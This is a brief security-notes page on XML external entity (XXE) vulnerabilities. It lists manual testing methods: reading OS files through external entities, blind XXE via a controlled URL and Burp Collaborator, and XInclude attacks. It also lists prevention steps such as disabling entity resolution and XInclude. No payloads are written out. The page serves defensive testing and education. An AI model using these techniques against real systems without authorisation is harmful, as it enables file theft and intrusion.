RedTeam
3.Web-Hacking
4.Injection
XXE
Commands
Testing and Prevention

Testing & Prevention

How to Find and Test for XXE vulnerabilities

  • Use BurpSuite's Web Vulnerability Scanner
  • Manually testing involves the following:
    • Testing for file retrieval by defining an external entity based on a well-known OS file
    • Testing for blind XXE by defining an external entity based on a URL to a system you control § Burp Collaborator Client can be used for this
    • Testing for vulnerab inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack

How to Prevent XXE Vulnerabilities

  • Disable features that allow an application's XML parsing library to support potentially dangerous XML features that the application does not need
  • Disable resolution of external entities
  • Disable support for XInclude
    • Done via configuration options or programmatically overriding default behavor
Commands1.what Is Xee Vulnerability